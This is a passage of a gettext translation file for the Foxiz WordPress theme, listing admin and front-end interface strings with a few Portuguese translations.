#: backend/panels/blog-pages.php:714 msgid "" "Select posts per page for the blog. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:178 msgid "" "Select posts per page for the categories. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:2030 msgid "" "Select posts per page for the search result listing. Leave this option blank " "to set the default." msgstr "" #: backend/category-settings.php:170 msgid "" "Select posts per page for this category. Leave this option blank to set the " "default." msgstr "" #: backend/panels/bookmark.php:562 msgid "Select posts per page for this section." msgstr "" #: backend/single-metaboxes.php:271 msgid "Select Primary Category" msgstr "" #: backend/panels/reaction.php:38 msgid "Select reaction items you would like to show." msgstr "" #: backend/panels/optimized.php:108 msgid "" "Select SEO options for your website. This panel helps your website optimized " "for SEO and appear better on the search engines." msgstr "" #: backend/panels/amp.php:278 msgid "Select setting for ads in AMP mode." msgstr "" #: backend/panels/amp.php:248 msgid "Select setting for auto ads in AMP mode." msgstr "" #: backend/panels/amp.php:172 msgid "Select setting for the single post your website in AMP mode." msgstr "" #: backend/panels/amp.php:29 backend/panels/amp.php:41 msgid "Select setting for your website in AMP mode." msgstr "" #: backend/panels/design.php:419 msgid "Select settings for post sliders on your website." msgstr "" #: backend/panels/header.php:176 msgid "Select settings for search form to display in the website header." msgstr "" #: backend/panels/table-contents.php:16 msgid "Select settings for table of contents." msgstr "" #: backend/panels/bookmark.php:16 msgid "Select settings for the bookmark system." msgstr "" #: backend/panels/single-post.php:1205 msgid "Select settings for the comment box." msgstr "" #: backend/panels/dark-mode.php:17 msgid "Select settings for the dark mode." msgstr "" #: backend/panels/single-post.php:472 msgid "Select settings for the entry category." msgstr "" #: backend/category-settings.php:346 backend/panels/block-classic.php:50 #: backend/panels/block-grid.php:50 backend/panels/block-grid.php:215 #: backend/panels/block-grid.php:380 backend/panels/block-grid.php:553 #: backend/panels/block-grid.php:740 backend/panels/block-list.php:58 #: backend/panels/block-list.php:231 backend/panels/block-list.php:412 #: backend/panels/block-list.php:607 backend/panels/blog-pages.php:375 #: backend/panels/blog-pages.php:862 backend/panels/blog-pages.php:1276 #: backend/panels/blog-pages.php:1684 backend/panels/blog-pages.php:2176 #: backend/panels/bookmark.php:274 backend/panels/bookmark.php:722 msgid "Select settings for the entry meta bar." msgstr "" #: backend/panels/newsletter.php:15 msgid "Select settings for the popup newsletter." msgstr "" #: backend/panels/header.php:520 msgid "Select settings for the popup sign in form." msgstr "" #: backend/category-settings.php:398 msgid "Select settings for the post excerpt." msgstr "" #: backend/panels/design.php:296 msgid "Select settings for the post featured image on your website." msgstr "" #: backend/panels/design.php:536 msgid "" "Select settings for the read more button on your website. You can " "enable/disable this part per module via Modules Design section." msgstr "" #: backend/panels/bookmark.php:90 msgid "Select settings for the reading list section." msgstr "" #: backend/panels/bookmark.php:504 msgid "Select settings for the recommended section." msgstr "" #: backend/panels/single-post.php:426 msgid "Select settings for the single sidebar." msgstr "" #: backend/panels/single-post.php:1125 msgid "Select settings for the sponsored posts." msgstr "" #: backend/panels/bookmark.php:440 msgid "Select settings for the user interests section." msgstr "" #: backend/panels/design.php:471 msgid "Select settings for your post entry meta." msgstr "" #: backend/panels/sidebar.php:8 msgid "" "Select settings for your website sidebars, The settings below apply to all " "sidebars." msgstr "" #: backend/panels/woocommerce.php:80 msgid "Select sidebar position for the shop page if you enabled the sidebar." msgstr "" #: backend/panels/single-post.php:692 msgid "Select socials you would like to show the share button." msgstr "" #: backend/panels/single-post.php:562 msgid "Select styles, layouts and other settings for the single post meta." msgstr "" #: backend/panels/woocommerce.php:173 msgid "Select styling options of your shop." msgstr "" #: backend/panels/header.php:707 msgid "Select text color for the bar in the dark mode." msgstr "" #: backend/panels/header.php:691 msgid "Select text color for the bar." msgstr "" #: backend/panels/sidebar.php:27 msgid "Select the default sidebar position for your website." msgstr "" #: backend/panels/header.php:51 msgid "Select the global header style for your website header." msgstr "" #: backend/panels/header.php:34 msgid "Select the style and other settings for your website header." msgstr "" #: backend/category-settings.php:259 msgid "" "Select total columns to show per row for the blog listing layout on the " "desktop device." msgstr "" #: backend/category-settings.php:275 msgid "" "Select total columns to show per row for the blog listing layout on the " "mobile device." msgstr "" #: backend/category-settings.php:267 msgid "" "Select total columns to show per row for the blog listing layout on the " "tablet device." msgstr "" #: backend/panels/blog-pages.php:275 backend/panels/blog-pages.php:762 #: backend/panels/blog-pages.php:1176 backend/panels/blog-pages.php:1584 #: backend/panels/blog-pages.php:2076 backend/panels/bookmark.php:179 #: backend/panels/bookmark.php:619 msgid "Select total columns to show per row on the mobile device." msgstr "" #: backend/panels/blog-pages.php:267 backend/panels/blog-pages.php:754 #: backend/panels/blog-pages.php:1168 backend/panels/blog-pages.php:1576 #: backend/panels/blog-pages.php:2068 backend/panels/bookmark.php:171 #: backend/panels/bookmark.php:611 msgid "Select total columns to show per row on the tablet device." msgstr "" #: backend/panels/blog-pages.php:259 backend/panels/blog-pages.php:746 #: backend/panels/blog-pages.php:1160 backend/panels/blog-pages.php:1568 #: backend/panels/blog-pages.php:2060 backend/panels/bookmark.php:163 #: backend/panels/bookmark.php:603 msgid "Select total columns to show per row." msgstr "" #: backend/panels/woocommerce.php:148 msgid "" "Select total related product to show at once. leave blank if you want to set " "as default." msgstr "" #: backend/panels/amp.php:482 backend/panels/amp.php:542 msgid "Select your ad type to display at the bottom single content." msgstr "" #: backend/panels/amp.php:361 msgid "Select your ad type to display at the footer." msgstr "" #: backend/panels/amp.php:301 msgid "Select your ad type to display at the header." msgstr "" #: backend/panels/amp.php:421 msgid "Select your ad type to display at the top single content." msgstr "" #: backend/single-metaboxes.php:398 msgid "Self-Hosted Audio" msgstr "" #: backend/single-metaboxes.php:350 msgid "Self-Hosted Video" msgstr "" #: backend/panels/optimized.php:107 msgid "SEO Optimized" msgstr "" #: backend/panels/optimized.php:115 msgid "SEO Snippets" msgstr "" #: backend/panels/dark-mode.php:43 msgid "" "Set the dark mode as the default color scheme when users visit your website " "a the first time." msgstr "" #: backend/panels/ads.php:287 msgid "Setup below settings corresponding to your ad type." msgstr "" #: backend/panels/design.php:231 msgid "" "Setup your custom meta to display in the post listing and single post page." msgstr "" #: backend/configs.php:875 backend/panels/blog-pages.php:50 #: backend/panels/blog-pages.php:616 backend/panels/blog-pages.php:1934 #: backend/panels/header-style.php:71 backend/panels/header-style.php:616 #: backend/single-metaboxes.php:133 backend/single-metaboxes.php:910 msgid "Shadow" msgstr "" #: templates/single/templates.php:269 msgid "SHARE" msgstr "" #: templates/single/templates.php:323 templates/single/templates.php:1532 msgid "Share" msgstr "Compartilhar" #: backend/panels/single-post.php:1507 msgid "Share on Facebook" msgstr "" #: backend/panels/single-post.php:1523 msgid "Share on Reddit" msgstr "" #: backend/panels/single-post.php:690 msgid "Share on Socials" msgstr "" #: backend/panels/single-post.php:1515 msgid "Share on Twitter" msgstr "" #: templates/single/templates.php:808 msgid "Share this Article" msgstr "" #: backend/panels/woocommerce.php:102 msgid "Shop - Archive Pages Options" msgstr "" #: backend/panels/woocommerce.php:54 msgid "Shop Page Options" msgstr "" #: backend/panels/woocommerce.php:87 msgid "Shop Sidebar Name" msgstr "" #: backend/panels/woocommerce.php:79 msgid "Shop Sidebar Position" msgstr "" #: backend/panels/optimized.php:182 msgid "" "Short description will display when searching your main site URL. Leave " "blank if you use 3rd plugins." msgstr "" #: backend/panels/header.php:732 msgid "Show a cart icon at the website header." msgstr "" #: backend/panels/single-post.php:1565 msgid "" "Show a font size icon that give visitors of your site the option to change " "the font size of your text." msgstr "" #: backend/panels/footer.php:54 msgid "Show a gray border a the top footer." msgstr "" #: backend/panels/design.php:550 msgid "Show a icon after the read more label." msgstr "" #: backend/panels/ads.php:455 msgid "Show ads or any shortcode in the slide up footer section." msgstr "" #: backend/panels/single-post.php:1441 msgid "Show Continue Reading" msgstr "" #: backend/panels/footer.php:107 msgid "Show gray borders between widget columns." msgstr "" #: backend/panels/table-contents.php:148 msgid "Show Hierarchy" msgstr "" #: backend/category-settings.php:144 backend/panels/blog-pages.php:134 #: backend/panels/blog-pages.php:671 msgid "Show in all pages" msgstr "" #: backend/category-settings.php:143 backend/panels/blog-pages.php:133 #: backend/panels/blog-pages.php:670 msgid "Show in the first page" msgstr "" #: backend/panels/header.php:739 msgid "Show mini cart icon in the header." msgstr "" #: backend/panels/header.php:747 msgid "Show mini cart icon in the mobile header." msgstr "" #: backend/panels/single-post.php:1373 includes/menu.php:244 #: includes/menu.php:297 templates/header/templates.php:701 #: templates/parts.php:326 msgid "Show More" msgstr "" #: backend/panels/table-contents.php:156 msgid "Show Number list" msgstr "" #: backend/panels/woocommerce.php:181 msgid "Show Percentage Saved" msgstr "" #: backend/panels/woocommerce.php:137 msgid "Show Review Box" msgstr "" #: backend/panels/header.php:223 msgid "Show search form at the top of the more section." msgstr "" #: backend/panels/single-post.php:1604 msgid "Show Share Bar" msgstr "" #: backend/category-settings.php:139 backend/panels/blog-pages.php:130 #: backend/panels/blog-pages.php:667 msgid "Show template in the first or all pages." msgstr "" #: backend/panels/design.php:104 msgid "Show the \"posted\" text before the post author meta." msgstr "" #: backend/panels/single-post.php:593 msgid "Show the \"posted\" text before the single post author meta." msgstr "" #: backend/panels/design.php:118 msgid "Show the clock icon before the post updated meta." msgstr "" #: backend/panels/design.php:338 msgid "Show the edit post link in the featured image for logged users." msgstr "" #: backend/panels/design.php:146 msgid "Show the icon before the post category meta." msgstr "" #: backend/panels/design.php:125 msgid "Show the icon before the post comment meta." msgstr "" #: backend/panels/design.php:111 msgid "Show the icon before the post date meta." msgstr "" #: backend/panels/design.php:132 msgid "Show the icon before the post view meta." msgstr "" #: backend/panels/design.php:139 msgid "Show the icon before the reading time meta." msgstr "" #: backend/panels/single-post.php:1492 msgid "" "Show the popup shares bar when the user highlight text in the post content." msgstr "" #: backend/panels/single-post.php:1212 backend/panels/single-post.php:1473 msgid "Show/Hide Comment Button" msgstr "" #: templates/blog.php:233 #, php-format msgid "Showing %s results for your search" msgstr "Mostrando %s resultados para sua pesquisa" #: backend/panels/reaction.php:54 msgid "Shy" msgstr "" #: backend/panels/ads.php:477 msgid "Side Up Expired" msgstr "" #: backend/panels/typography.php:1105 msgid "Sidebar Archive & Menu Widgets" msgstr "" #: backend/panels/page.php:60 backend/panels/sidebar.php:7 #: backend/panels/single-post.php:424 backend/single-metaboxes.php:83 #: backend/single-metaboxes.php:442 msgid "Sidebar Area" msgstr "" #: backend/category-settings.php:295 backend/panels/blog-pages.php:305 #: backend/panels/blog-pages.php:792 backend/panels/blog-pages.php:1206 #: backend/panels/blog-pages.php:1614 backend/panels/blog-pages.php:2106 #: backend/panels/bookmark.php:208 backend/panels/bookmark.php:656 #: backend/panels/page.php:66 backend/panels/single-post.php:441 #: backend/single-metaboxes.php:88 backend/single-metaboxes.php:447 msgid "Sidebar Position" msgstr "" #: backend/panels/amp.php:231 msgid "Sidebar Section" msgstr "" #: backend/panels/heading.php:90 msgid "Sidebar Widget Heading" msgstr "" #: backend/panels/header.php:532 templates/header/templates.php:315 #: templates/header/templates.php:317 templates/header/templates.php:616 #: templates/popup.php:191 msgid "Sign In" msgstr "Entrar" #: templates/parts.php:825 msgid "Sign In to Follow" msgstr "" #: bookmark/template-helpers.php:59 msgid "Sign In to Save" msgstr "" #: backend/panels/header.php:567 msgid "Sign in to your account" msgstr "" #: templates/header/templates.php:310 msgid "Sign Out" msgstr "Sair" #: backend/panels/single-post.php:343 msgid "Sign Up For Daily Newsletter" msgstr "" #: backend/configs.php:561 backend/panels/blog-pages.php:1453 #: backend/panels/blog-pages.php:1861 msgid "Simple" msgstr "" #: includes/sidebars.php:164 msgid "Single Content - Bottom Area" msgstr "" #: includes/sidebars.php:155 msgid "Single Content - Top Area" msgstr "" #: backend/panels/typography.php:692 msgid "Single Headline Fonts (Post Title)" msgstr "" #: backend/panels/single-post.php:44 msgid "Single Layout" msgstr "" #: backend/panels/page.php:16 msgid "Single Page" msgstr "" #: backend/panels/breadcrumb.php:61 msgid "Single Page Breadcrumb" msgstr "" #: backend/single-metaboxes.php:44 msgid "Single Page Settings" msgstr "" #: backend/panels/amp.php:171 backend/panels/single-post.php:14 #: backend/panels/typography.php:683 msgid "Single Post" msgstr "" #: backend/panels/breadcrumb.php:50 msgid "Single Post Breadcrumb" msgstr "" #: backend/panels/woocommerce.php:131 msgid "Single Product Page" msgstr "" #: backend/panels/single-post.php:514 msgid "Single Tagline" msgstr "" #: backend/panels/typography.php:749 msgid "Single Tagline Fonts (Sub Title)" msgstr "" #: backend/single-metaboxes.php:167 backend/single-metaboxes.php:944 msgid "Site Footer" msgstr "" #: backend/category-settings.php:51 backend/panels/blog-pages.php:31 #: backend/panels/blog-pages.php:597 backend/panels/blog-pages.php:1915 #: backend/panels/single-post.php:1540 backend/single-metaboxes.php:107 #: backend/single-metaboxes.php:113 msgid "Site Header" msgstr "" #: backend/panels/optimized.php:129 msgid "Sitelinks Search Box" msgstr "" #: templates/parts.php:615 msgid "Skype" msgstr "" #: backend/panels/socials.php:80 msgid "Skype URL" msgstr "" #: backend/configs.php:846 msgid "Skyscraper (120x600)" msgstr "" #: backend/panels/reaction.php:45 msgid "Sleepy" msgstr "" #: backend/panels/design.php:445 msgid "Slide" msgstr "" #: backend/panels/design.php:442 msgid "Slide Effect" msgstr "" #: backend/panels/ads.php:500 msgid "Slide Up Background" msgstr "" #: backend/panels/ads.php:469 msgid "Slide Up Template Shortcode" msgstr "" #: backend/panels/design.php:418 msgid "Slider Animation" msgstr "" #: backend/panels/page.php:45 backend/panels/single-post.php:185 #: backend/single-metaboxes.php:74 msgid "Small - 860px" msgstr "" #: backend/category-settings.php:248 backend/configs.php:467 #: backend/panels/block-grid.php:347 msgid "Small Grid" msgstr "" #: backend/panels/block-grid.php:357 msgid "small grid" msgstr "" #: backend/panels/single-post.php:1339 msgid "Small Grid 1 (4 Columns)" msgstr "" #: backend/configs.php:848 msgid "Small Rectangle (180x150)" msgstr "" #: backend/configs.php:850 msgid "Small Square (200x200)" msgstr "" #: backend/panels/header.php:89 msgid "Smart Sticky" msgstr "" #: backend/panels/table-contents.php:163 msgid "Smooth Scroll" msgstr "" #: templates/parts.php:618 msgid "SnapChat" msgstr "" #: backend/panels/socials.php:86 msgid "Snapchat URL" msgstr "" #: backend/panels/amp.php:103 backend/panels/footer.php:164 #: backend/panels/header-style.php:36 backend/panels/header-style.php:330 #: backend/panels/header-style.php:581 msgid "Social Icons" msgstr "" #: backend/panels/socials.php:14 backend/panels/socials.php:22 msgid "Social Profiles" msgstr "" #: backend/panels/header.php:373 backend/panels/single-post.php:1627 msgid "Socials List" msgstr "" #: backend/configs.php:612 msgid "Solid Light Gray" msgstr "" #: backend/panels/optimized.php:44 msgid "" "Some 3rd party plugins will load this font icon. Disable it if you have not " "plan to use it." msgstr "" #: backend/class-tgm-plugin-activation.php:345 backend/install-plugins.php:69 msgid "Something went wrong with the plugin API." msgstr "" #: templates/page.php:121 msgid "Something's wrong here..." msgstr "" #: templates/ajax.php:188 templates/blog.php:520 msgid "" "Sorry, but nothing matched your search terms. Please try again with some " "different keywords." msgstr "" "Desculpe, mas nada corresponde aos seus termos de pesquisa. Por favor, tente " "novamente com algumas palavras-chave diferentes." #: backend/install-plugins.php:75 #, php-format msgid "" "Sorry, but you do not have the correct permissions to activate the %s plugin." " Contact the administrator of this site for help on getting the plugin " "activated." msgstr "" #: backend/install-plugins.php:72 #, php-format msgid "" "Sorry, but you do not have the correct permissions to install the %s plugin. " "Contact the administrator of this site for help on getting the plugin " "installed." msgstr "" #: backend/install-plugins.php:77 #, php-format msgid "" "Sorry, but you do not have the correct permissions to update the %s plugin. " "Contact the administrator of this site for help on getting the plugin " "updated." msgstr "" #: templates/parts.php:633 msgid "SoundCloud" msgstr "" #: backend/panels/socials.php:116 msgid "Soundcloud URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2642 msgid "Source" msgstr "" #: backend/single-metaboxes.php:778 msgid "Source Name" msgstr "" #: backend/single-metaboxes.php:783 msgid "Source URL" msgstr "" #: backend/panels/single-post.php:304 msgid "Sources Bar" msgstr "" #: backend/single-metaboxes.php:766 msgid "Sources/Via" msgstr "" #: templates/single/templates.php:670 msgid "SOURCES:" msgstr "Fontes:" #: backend/panels/ads.php:237 msgid "Spacing" msgstr "" #: backend/configs.php:244 backend/panels/single-post.php:537 #: backend/single-metaboxes.php:230 msgid "span" msgstr "" #: backend/single-metaboxes.php:642 msgid "Sponsor Light Logo" msgstr "" #: backend/single-metaboxes.php:636 msgid "Sponsor Logo" msgstr "" #: backend/single-metaboxes.php:629 msgid "Sponsor Name" msgstr "" #: backend/single-metaboxes.php:622 msgid "Sponsor URL" msgstr "" #: backend/panels/single-post.php:1134 templates/entry.php:1201 msgid "Sponsored by" msgstr "" #: backend/panels/block-classic.php:113 backend/panels/block-grid.php:113 #: backend/panels/block-grid.php:278 backend/panels/block-grid.php:443 #: backend/panels/block-grid.php:616 backend/panels/block-grid.php:803 #: backend/panels/block-list.php:121 backend/panels/block-list.php:294 #: backend/panels/block-list.php:475 backend/panels/block-list.php:670 msgid "Sponsored Meta" msgstr "" #: backend/panels/single-post.php:1132 msgid "Sponsored Meta Text" msgstr "" #: backend/panels/single-post.php:1123 backend/single-metaboxes.php:606 #: backend/single-metaboxes.php:611 msgid "Sponsored Post" msgstr "" #: backend/configs.php:851 msgid "Square (250x250)" msgstr "" #: backend/panels/blocks.php:14 msgid "Standard Blog Design" msgstr "" #: backend/single-metaboxes.php:298 msgid "Standard Format" msgstr "" #: backend/single-metaboxes.php:304 msgid "Standard Layout" msgstr "" #: backend/panels/single-post.php:38 msgid "Standard Post Format Layout" msgstr "" #: backend/panels/header.php:207 msgid "Standard Search Form" msgstr "" #: backend/configs.php:48 includes/sidebars.php:70 msgid "Standard Sidebar" msgstr "" #: backend/single-metaboxes.php:508 msgid "Stars (1 > 5)" msgstr "" #: bookmark/templates.php:61 #, php-format msgid "" "Start saving your interested articles by clicking the %s icon and you'll " "find them all here." msgstr "" #: backend/class-tgm-plugin-activation.php:2648 msgid "Status" msgstr "" #: backend/panels/single-post.php:1580 backend/panels/single-post.php:1596 msgid "Sticky Headline" msgstr "" #: backend/panels/header.php:76 backend/panels/header.php:82 msgid "Sticky Menu" msgstr "" #: backend/category-settings.php:311 backend/panels/blog-pages.php:321 #: backend/panels/blog-pages.php:808 backend/panels/blog-pages.php:1222 #: backend/panels/blog-pages.php:1630 backend/panels/blog-pages.php:2122 #: backend/panels/bookmark.php:224 backend/panels/bookmark.php:672 #: backend/panels/page.php:82 backend/panels/sidebar.php:47 #: backend/panels/single-post.php:449 msgid "Sticky Sidebar" msgstr "" #: backend/panels/single-post.php:1582 msgid "" "Sticky the single heading and share on socials list when scrolling down." msgstr "" #: backend/panels/optimized.php:209 msgid "Street Address" msgstr "" #: backend/panels/page.php:33 backend/single-metaboxes.php:61 msgid "Style 1" msgstr "" #: backend/configs.php:72 msgid "Style 1 (Left Menu)" msgstr "" #: backend/configs.php:584 msgid "Style 1 (Right Featured Image)" msgstr "" #: backend/panels/design.php:579 backend/panels/page.php:34 #: backend/single-metaboxes.php:62 msgid "Style 2" msgstr "" #: backend/configs.php:585 msgid "Style 2 (Background Image)" msgstr "" #: backend/panels/design.php:596 msgid "Style 2 (Opacity)" msgstr "" #: backend/configs.php:73 msgid "Style 2 (Right Menu)" msgstr "" #: backend/panels/design.php:580 msgid "Style 3" msgstr "" #: backend/configs.php:74 msgid "Style 3 (Center Menu)" msgstr "" #: backend/configs.php:586 msgid "Style 3 (Minimalist)" msgstr "" #: backend/panels/design.php:581 msgid "Style 4" msgstr "" #: backend/configs.php:75 msgid "Style 4 (Border)" msgstr "" #: backend/panels/design.php:582 msgid "Style 5" msgstr "" #: backend/configs.php:76 msgid "Style 5 (Center Logo)" msgstr "" #: backend/panels/design.php:583 msgid "Style 6" msgstr "" #: backend/panels/design.php:584 msgid "Style 7" msgstr "" #: backend/panels/design.php:585 msgid "Style 8" msgstr "" #: backend/panels/ads.php:215 backend/panels/ads.php:404 msgid "Style Settings" msgstr "" #: backend/category-settings.php:112 backend/panels/blog-pages.php:98 msgid "Sub Categories List" msgstr "" #: backend/mega-menu.php:214 msgid "Sub Label" msgstr "" #: backend/panels/header-style.php:149 backend/panels/header-style.php:227 #: backend/panels/header-style.php:437 backend/panels/header-style.php:516 #: backend/panels/header-style.php:704 backend/panels/header-style.php:782 msgid "Sub Menu - Background Color" msgstr "" #: backend/panels/header-style.php:168 backend/panels/header-style.php:246 #: backend/panels/header-style.php:457 backend/panels/header-style.php:535 #: backend/panels/header-style.php:723 backend/panels/header-style.php:801 msgid "Sub Menu - Hover Text Color" msgstr "" #: backend/panels/header-style.php:160 backend/panels/header-style.php:238 #: backend/panels/header-style.php:449 backend/panels/header-style.php:527 #: backend/panels/header-style.php:715 backend/panels/header-style.php:793 msgid "Sub Menu - Text Color" msgstr "" #: backend/panels/typography.php:924 msgid "Sub-Level Menu Font" msgstr "" #: backend/panels/typography.php:969 msgid "Sub-Level Mobile Menu Font" msgstr "" #: backend/panels/newsletter.php:43 msgid "" "Subscribe to our newsletter and never miss our latest news, podcasts etc." msgstr "" #: backend/panels/design.php:258 msgid "Suffix" msgstr "" #: templates/single/reviews.php:214 msgid "Summary" msgstr "" #: backend/panels/table-contents.php:56 msgid "Support H1" msgstr "" #: backend/panels/table-contents.php:57 msgid "" "Support H1 tag, Turn this option off if you would like to exclude H1 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:63 msgid "Support H2" msgstr "" #: backend/panels/table-contents.php:64 msgid "" "Support H2 tag, Turn this option off if you would like to exclude H2 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:70 msgid "Support H3" msgstr "" #: backend/panels/table-contents.php:71 msgid "" "Support H3 tag, Turn this option off if you would like to exclude H3 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:77 msgid "Support H4" msgstr "" #: backend/panels/table-contents.php:78 msgid "" "Support H4 tag, Turn this option off if you would like to exclude H4 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:84 msgid "Support H5" msgstr "" #: backend/panels/table-contents.php:85 msgid "" "Support H5 tag, Turn this option off if you would like to exclude H5 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:91 msgid "Support H6" msgstr "" #: backend/panels/table-contents.php:92 msgid "" "Support H6 tag, Turn this option off if you would like to exclude H6 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:36 msgid "Support Single Page" msgstr "" #: backend/panels/table-contents.php:29 msgid "Support Single Post" msgstr "" #: backend/panels/design.php:622 msgid "Support upload file type SVG for your website." msgstr "" #: backend/panels/reaction.php:55 msgid "Surprise" msgstr "" #: backend/panels/design.php:621 msgid "SVG Supported" msgstr "" #: backend/panels/design.php:614 msgid "SVG Upload" msgstr "" #: templates/header/templates.php:667 msgid "Switch to Dark" msgstr "" #: templates/header/templates.php:666 msgid "Switch to Light" msgstr "" #: backend/single-metaboxes.php:705 msgid "Table of Content" msgstr "" #: backend/panels/table-contents.php:14 backend/single-metaboxes.php:710 msgid "Table of Contents" msgstr "" #: backend/panels/table-contents.php:132 msgid "Table of Contents Heading" msgstr "" #: backend/category-settings.php:479 backend/panels/block-classic.php:138 #: backend/panels/block-grid.php:138 backend/panels/block-grid.php:303 #: backend/panels/block-grid.php:468 backend/panels/block-grid.php:641 #: backend/panels/block-grid.php:828 backend/panels/block-list.php:146 #: backend/panels/block-list.php:319 backend/panels/block-list.php:500 #: backend/panels/block-list.php:695 backend/panels/blog-pages.php:504 #: backend/panels/blog-pages.php:991 backend/panels/blog-pages.php:1405 #: backend/panels/blog-pages.php:1813 backend/panels/blog-pages.php:2305 #: backend/panels/bookmark.php:403 backend/panels/bookmark.php:851 msgid "Tablet - Hide Entry Meta" msgstr "" #: backend/category-settings.php:449 backend/panels/blog-pages.php:475 #: backend/panels/blog-pages.php:962 backend/panels/blog-pages.php:1376 #: backend/panels/blog-pages.php:1784 backend/panels/blog-pages.php:2276 #: backend/panels/bookmark.php:374 backend/panels/bookmark.php:822 msgid "Tablet - Title Font Size" msgstr "" #: backend/panels/typography.php:59 backend/panels/typography.php:105 #: backend/panels/typography.php:154 backend/panels/typography.php:203 #: backend/panels/typography.php:252 backend/panels/typography.php:301 #: backend/panels/typography.php:350 backend/panels/typography.php:399 #: backend/panels/typography.php:448 backend/panels/typography.php:514 #: backend/panels/typography.php:562 backend/panels/typography.php:617 #: backend/panels/typography.php:660 backend/panels/typography.php:736 #: backend/panels/typography.php:793 backend/panels/typography.php:877 #: backend/panels/typography.php:1063 backend/panels/typography.php:1135 msgid "Tablet Font Size" msgstr "" #: backend/configs.php:405 backend/panels/design.php:271 msgid "tag (Tags)" msgstr "" #: templates/single/templates.php:639 msgid "TAGGED:" msgstr "Tags" #: backend/single-metaboxes.php:198 msgid "Tagline" msgstr "" #: backend/single-metaboxes.php:193 msgid "Tagline & Highlights" msgstr "" #: backend/panels/typography.php:1069 msgid "Tagline Font" msgstr "" #: backend/single-metaboxes.php:219 msgid "Tagline HTML Tag" msgstr "" #: backend/panels/typography.php:1070 msgid "" "Tagline tag will use default H6 tag font settings. Select font values if you " "would like to choose a custom font." msgstr "" #: backend/panels/blog-pages.php:1478 msgid "Tags & Archives" msgstr "" #: templates/entry.php:519 msgid "Tags:" msgstr "" #: backend/panels/single-post.php:795 backend/panels/single-post.php:934 #: backend/panels/single-post.php:1072 backend/panels/single-post.php:1697 #: templates/parts.php:645 msgid "Telegram" msgstr "" #: backend/panels/socials.php:140 msgid "Telegram URL " msgstr "" #: backend/category-settings.php:138 backend/panels/blog-pages.php:129 #: backend/panels/blog-pages.php:666 msgid "Template Display" msgstr "" #: backend/mega-menu.php:200 backend/panels/blog-pages.php:119 #: backend/panels/single-post.php:1402 msgid "Template Shortcode" msgstr "" #: backend/panels/header.php:551 msgid "Text Button" msgstr "" #: backend/category-settings.php:37 backend/panels/design.php:52 #: backend/panels/header-style.php:124 backend/panels/header-style.php:202 #: backend/panels/header-style.php:268 backend/panels/header-style.php:412 #: backend/panels/header-style.php:491 backend/panels/header-style.php:679 #: backend/panels/header-style.php:757 backend/panels/header.php:420 #: backend/panels/header.php:473 backend/panels/header.php:690 #: backend/panels/privacy.php:48 msgid "Text Color" msgstr "" #: backend/panels/footer.php:61 backend/panels/header.php:284 msgid "Text Color Scheme" msgstr "" #: backend/panels/footer.php:63 msgid "Text color scheme will be set to light in the dark mode." msgstr "" #: backend/mega-menu.php:146 msgid "Text Color Scheme: " msgstr "" #: backend/class-tgm-plugin-activation.php:2076 #, php-format msgid "TGMPA v%s" msgstr "" #: backend/panels/header.php:645 msgid "" "The alert bar will not be available if you use a header template. The theme " "provides other ways for you to add any info into the header template via " "HTML, text and button and other blocks." msgstr "" #: backend/panels/amp.php:15 msgid "" "The AMP plugin not found! Accelerated Mobile Pages support, Please install " "and activate Automattic AMP plugin to activate settings below." msgstr "" #: backend/panels/single-post.php:385 msgid "" "The author box requests author information (Users > Profile) for displaying." msgstr "" #: backend/panels/general.php:27 msgid "" "The back to top will be invisible on the mobile because it is not helpful." msgstr "" #: backend/panels/design.php:32 msgid "The category label display in the post listing." msgstr "" #: backend/panels/header.php:334 msgid "The center logo style is best suited for small width logos." msgstr "" #: includes/sidebars.php:71 msgid "The default sidebar of your website" msgstr "" #: backend/panels/heading.php:114 msgid "The default tag is H4." msgstr "" #: backend/panels/optimized.php:92 msgid "" "The dynamic file CSS may not apply immediately on some servers due to the " "server cache." msgstr "" #: backend/install-plugins.php:76 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure " "maximum compatibility with Foxiz: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:360 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure " "maximum compatibility with this theme: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:400 #: backend/class-tgm-plugin-activation.php:3046 msgid "The following plugin was activated successfully:" msgstr "" #: backend/class-tgm-plugin-activation.php:378 backend/install-plugins.php:74 #, php-format msgid "The following recommended plugin is currently inactive: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:372 backend/install-plugins.php:73 #, php-format msgid "The following required plugin is currently inactive: %1$s." msgstr "" #: backend/panels/typography.php:490 msgid "The font size will use the post entry meta font size setting." msgstr "" #: includes/sidebars.php:97 msgid "The full width section at the top of the footer." msgstr "" #: backend/panels/heading.php:17 msgid "The global heading settings for blocks, widgets, archives." msgstr "" #: backend/panels/header.php:42 msgid "The global settings will apply whole the website." msgstr "" #: backend/panels/header.php:189 msgid "" "The heading will show in the \"More\" section and \"Mobile Header Collapse\" " "section." msgstr "" #: backend/panels/blog-pages.php:2382 msgid "" "The image will be limited at 300px of height. Recommended image height is " "about 600px for the retina screen." msgstr "" #: backend/class-tgm-plugin-activation.php:3601 msgid "" "The installation and activation process is starting. This process may take a " "while on some hosts, so please be patient." msgstr "" #: backend/class-tgm-plugin-activation.php:3597 #, php-format msgid "The installation of %1$s failed." msgstr "" #: backend/class-tgm-plugin-activation.php:3609 msgid "" "The installation process is starting. This process may take a while on some " "hosts, so please be patient." msgstr "" #: backend/panels/single-post.php:46 msgid "" "The layout automatically rollback to the \"Classic\" if featured image isn't " "set." msgstr "" #: backend/panels/ads.php:478 backend/panels/newsletter.php:78 msgid "The period to redisplay the popup when visitors closed it." msgstr "" #: backend/panels/design.php:687 msgid "The recommended value is 1 to 20. Leave blank to set it as the default." msgstr "" #: backend/panels/single-post.php:1277 msgid "" "The related box will not appear on post have number of paragraph less than " "this setting." msgstr "" #: backend/class-tgm-plugin-activation.php:1030 msgid "" "The remote plugin package consists of more than one file, but the files are " "not packaged in a folder." msgstr "" #: backend/class-tgm-plugin-activation.php:1027 